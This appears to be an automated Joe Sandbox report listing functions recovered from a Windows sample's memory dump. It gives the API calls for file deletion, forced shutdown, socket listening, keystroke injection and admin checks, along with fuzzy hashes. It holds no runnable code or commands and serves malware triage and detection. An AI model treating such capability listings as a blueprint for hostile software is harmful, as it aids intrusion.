FindResourceW.KERNEL32(?,?,00000003), ref: 002644C1
LoadResource.KERNEL32(?,00000000), ref: 002644D3
SizeofResource.KERNEL32(?,00000000), ref: 002644E2
LockResource.KERNEL32(?), ref: 002644EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0026454F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: c586aba71b26b4ab65202840eb45fd1afce165c3546e502ce1d9f6abda2261a3
Instruction ID: a7ff1899c08700390506beba54637db70d8f0f3183d75028741b77e4c02c3b91
Opcode Fuzzy Hash: c586aba71b26b4ab65202840eb45fd1afce165c3546e502ce1d9f6abda2261a3
Instruction Fuzzy Hash: BB31AF7191121AAFDB11AFA0EC88EBF7BACFF04341F404426F956D6150EB74DA60CBA0

Function 00274830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00274857
EmptyClipboard.USER32 ref: 0027485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00274872
CloseClipboard.USER32 ref: 00274911

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 34a817767ab9340604bfe42c46c0ed6c999636f0478a84b001bb51a8b9319145
Instruction ID: adb6c033b6898041738039a16f73f28c6756e8d146b1b4584011be5fb0d486fc
Opcode Fuzzy Hash: 34a817767ab9340604bfe42c46c0ed6c999636f0478a84b001bb51a8b9319145
Instruction Fuzzy Hash: 67217131661215DFDB11AF60FC4DB2E77A8EF44721F00C016FA099B2A1DB70AD208F55

Function 00263CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00220284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00212A58,?,00008000), ref: 002202A4

Part of subcall function 00264FEC: GetFileAttributesW.KERNEL32(?,00263BFE), ref: 00264FED

FindFirstFileW.KERNEL32(?,?), ref: 00263D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00263E3E
MoveFileW.KERNEL32(?,?), ref: 00263E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00263E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00263E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00263EAC

Strings

\*.*, xrefs: 00263D41, 00263D4A, 00263D5F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 59c48a5a7ed5cc8c072c709d87cda4d0ebcaefa4db541831ce0ac0b4debf6102
Instruction ID: 86095cb062e64133e35ca4c1431a89bfcd5646fac0dd9ef681295a6b484655c0
Opcode Fuzzy Hash: 59c48a5a7ed5cc8c072c709d87cda4d0ebcaefa4db541831ce0ac0b4debf6102
Instruction Fuzzy Hash: 5A51A53182111DAACF15EBE0D9929EDB7B9AF21300F600165E946B3192DF316FA9CF61

Function 0026FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0026FA83
FindClose.KERNEL32(00000000), ref: 0026FB96

Part of subcall function 002052B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002052E6

Sleep.KERNEL32(0000000A), ref: 0026FAB3
_wcscmp.LIBCMT ref: 0026FAC7
_wcscmp.LIBCMT ref: 0026FAE2
FindNextFileW.KERNEL32(?,?), ref: 0026FB80

Strings

*.*, xrefs: 0026FA68

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: a9e76b2909dc60e882a05614e429fb53b24c6c9fc94e4d7acc2144e3e45ce1a5
Instruction ID: a33f75c73fc0b48f8cc8204d72d9773d9bdc1233bcea065f8682a6a3776d11b5
Opcode Fuzzy Hash: a9e76b2909dc60e882a05614e429fb53b24c6c9fc94e4d7acc2144e3e45ce1a5
Instruction Fuzzy Hash: 1041B47192021E9FCF54DFA4DD59AEEBBB4FF19340F104166E814A2190EB309EA4CF90

Function 00265778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00259399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002593E3
Part of subcall function 00259399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00259410
Part of subcall function 00259399: GetLastError.KERNEL32 ref: 0025941D

ExitWindowsEx.USER32(?,00000000), ref: 002657B4

Strings

@, xrefs: 002657A7
SeShutdownPrivilege, xrefs: 00265784
, xrefs: 002657A2

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 8c483bc0199362abedad0609c8beecbb226b411f82dfa58b8059d5fe50624126
Instruction ID: 3f6613fab6b8a8e159b6bd08f47d2abbbb2c39c73847ae7e3b73754ae0ee9da4
Opcode Fuzzy Hash: 8c483bc0199362abedad0609c8beecbb226b411f82dfa58b8059d5fe50624126
Instruction Fuzzy Hash: 8701F731670727EEE72A6AA4AC8ABBBB258AB04741F100166FC53D60D2EA905CA08594

Function 0027696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002769C7
WSAGetLastError.WSOCK32(00000000), ref: 002769D6
bind.WSOCK32(00000000,?,00000010), ref: 002769F2
listen.WSOCK32(00000000,00000005), ref: 00276A01
WSAGetLastError.WSOCK32(00000000), ref: 00276A1B
closesocket.WSOCK32(00000000,00000000), ref: 00276A2F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 990df23c66f252483a6cf5c10c34daa2bea2b539585abaf3142337373bfb49bb
Instruction ID: 5510bdc8353ae492892c6feab9689d46b43c1816b71d74cefc1d8ee0a4aa0ea1
Opcode Fuzzy Hash: 990df23c66f252483a6cf5c10c34daa2bea2b539585abaf3142337373bfb49bb
Instruction Fuzzy Hash: D221C1712106059FCB00EF64D889E6EB7B9EF44720F14C159E91AA73D1CB70AC11CF90

Function 00201663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 002029E2: GetWindowLongW.USER32(?,000000EB), ref: 002029F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00201DD6
GetSysColor.USER32(0000000F), ref: 00201E2A
SetBkColor.GDI32(?,00000000), ref: 00201E3D

Part of subcall function 0020166C: DefDlgProcW.USER32(?,00000020,?), ref: 002016B4

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 635f627a310fa7df46256f257cf2e12fc876580addefe68577e09de540848c13
Instruction ID: 9b22a48abe75e6fcd71b56f03b65c6790450e495e2adb5a6f48ff026a6ad3d63
Opcode Fuzzy Hash: 635f627a310fa7df46256f257cf2e12fc876580addefe68577e09de540848c13
Instruction Fuzzy Hash: 64A111B413660ABEE729BF699C49E7B369DEF42305F24010AF502C61D3CB609D31DA76

Function 0026C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0026C329
_wcscmp.LIBCMT ref: 0026C359
_wcscmp.LIBCMT ref: 0026C36E
FindNextFileW.KERNEL32(00000000,?), ref: 0026C37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0026C3AF

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 6713013ca817b9441de9ab67f89301c0cd7ce57353a4e6239bca0772b10e6b67
Instruction ID: 80c7d8d056d070e744768bff030626d44578618a7fdd2a529bf0adc030ad1061
Opcode Fuzzy Hash: 6713013ca817b9441de9ab67f89301c0cd7ce57353a4e6239bca0772b10e6b67
Instruction Fuzzy Hash: 5151BD756206029FD714EF68D490EAAB3E4EF09310F10825EE99A873A1CB30ED60CF91

Function 00276E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00278475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002784A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00276E89
WSAGetLastError.WSOCK32(00000000), ref: 00276EB2
bind.WSOCK32(00000000,?,00000010), ref: 00276EEB
WSAGetLastError.WSOCK32(00000000), ref: 00276EF8
closesocket.WSOCK32(00000000,00000000), ref: 00276F0C

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: f9345790ea321f96eab9f49fd0947f561204799b0e6600a0c6f2d54c533246e5
Instruction ID: 0478edfad6433edf893d09c656083e8436b281aa7a017aeb8ab68dfa742e3659
Opcode Fuzzy Hash: f9345790ea321f96eab9f49fd0947f561204799b0e6600a0c6f2d54c533246e5
Instruction Fuzzy Hash: D641B1B5720714AFDB10BF64988AF6E77A89B44714F04C558FA09AB3D3DA709D108FA1

Function 002859B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00285A02
IsWindowEnabled.USER32 ref: 00285A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00285A1D
IsIconic.USER32 ref: 00285A2B
IsZoomed.USER32 ref: 00285A39

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 26275d47a5daeab450a34eb8625d87efa75cb1c9bd79c5a2daaf80dafe311434
Instruction ID: 660c25b3fae890162e30be0a6044e95330e8d33a576e2e8790642bbde196d448
Opcode Fuzzy Hash: 26275d47a5daeab450a34eb8625d87efa75cb1c9bd79c5a2daaf80dafe311434
Instruction Fuzzy Hash: 4C110875321A269FE7113F669CC8A2E779DFF44721B004129F805D7281CB70ED218BD0

Function 00240030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00240034
__swprintf.LIBCMT ref: 00240065

Strings

WIN_XPe, xrefs: 002400A4
%.3d, xrefs: 0024003F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: fc95b9240fe70733ff1f53157b43474d38094dd70ac308df804ebbc6f258632f
Instruction ID: bb4a971e4f57b7dadb24359b034ffa58b75b99e784fd5901344e038921569e40
Opcode Fuzzy Hash: fc95b9240fe70733ff1f53157b43474d38094dd70ac308df804ebbc6f258632f
Instruction Fuzzy Hash: 9DD01272C38119EAC70CDB90D8C5DFD737CAB04304F101452F606A2040D2B597F89A26

Function 002729BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00272AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00272AE4

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 92322d4a8e0f429d3cf4f7c1e42e50ca58d0ecac11716f286b5d7cfb2a94bad0
Instruction ID: 446fd686bfc89d0de6d88df0f69a8a50116cab935b4c64a72e185dc1bff0353d
Opcode Fuzzy Hash: 92322d4a8e0f429d3cf4f7c1e42e50ca58d0ecac11716f286b5d7cfb2a94bad0
Instruction Fuzzy Hash: 5A41FB7152030AFFEB20DE95DC85FBBB7BCEB40754F10801AF609A7141D670AE659A60

Function 00259399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00220FE6: std::exception::exception.LIBCMT ref: 0022101C
Part of subcall function 00220FE6: __CxxThrowException@8.LIBCMT ref: 00221031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002593E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00259410
GetLastError.KERNEL32 ref: 0025941D

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 55c0ace1733640f938cb8e3477f77c8679df6a82b095cbc887e90ee32b227b03
Instruction ID: e5054e8d4bc22eca4d69b90b6b982777c4a46dcbfdbbde459a76c8e43fcd7b55
Opcode Fuzzy Hash: 55c0ace1733640f938cb8e3477f77c8679df6a82b095cbc887e90ee32b227b03
Instruction Fuzzy Hash: 9B11BFB1428209FFD728DF64ECC9D2BB7BCEB44311B20812EF84986241EB70AC51CB64

Function 00264254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00264271
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002642B2
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002642BD

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 44733c80a63d1c3b1afc96935cbbf1315adddae74e881a765fd70f7f00ca318e
Instruction ID: cfd52b84e49b50de93542184eed34f0f8a88774d1d0a30f27c77cb409daec2c6
Opcode Fuzzy Hash: 44733c80a63d1c3b1afc96935cbbf1315adddae74e881a765fd70f7f00ca318e
Instruction Fuzzy Hash: 54118E71E01228BFDB108FA5AC88BAFBFBCEB45B20F104156FD04E7280C6704A448BA1

Function 00264F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00264F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00264F5C
FreeSid.ADVAPI32(?), ref: 00264F6C

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: c9e4304d63a3e6320e701e6f6cb3ea5427c124bc88755cffd661d4ba483beb67
Instruction ID: 27b8487fa31403a1368cb5fc06f4957f1fa042b1d7407d42c9d32d00e3a29e8c
Opcode Fuzzy Hash: c9e4304d63a3e6320e701e6f6cb3ea5427c124bc88755cffd661d4ba483beb67
Instruction Fuzzy Hash: 39F04975A1130DBFDF00DFE0EC89EAEBBBCEF08201F0044A9A901E2580E7346A448B50

Function 00261AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00261B01
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00261B14

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 87db6066e3bf2f8ea06dc5820332a855e92c6764879f8a339eaf1089081faf21
Instruction ID: 8da96dcbebe8058eef1ec8d66dba41b3b72c7a9d18f634141b17f3a1db0309e5
Opcode Fuzzy Hash: 87db6066e3bf2f8ea06dc5820332a855e92c6764879f8a339eaf1089081faf21
Instruction Fuzzy Hash: D4F0497191024DAFDB00CF94D846BFE7BB4FF04316F00804AF95596292D3799625DF94

Function 0026A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00279B52,?,0029098C,?), ref: 0026A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00279B52,?,0029098C,?), ref: 0026A6EC

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 47f34208b51cc0a322d9c8a81ad3c2a662d5d86a29b9ddbd67f4e03882cc7539
Instruction ID: baa7a882e382f4531d19da35fe43fad3d0b0eb8528223f6c052daff3369311e7
Opcode Fuzzy Hash: 47f34208b51cc0a322d9c8a81ad3c2a662d5d86a29b9ddbd67f4e03882cc7539
Instruction Fuzzy Hash: 7DF0893552421DBFDB209FA4DC48FDA776DBF09351F004156B90896151D6709550CFE1

Function 00258DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00258F27), ref: 00258DFE
CloseHandle.KERNEL32(?,?,00258F27), ref: 00258E10

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
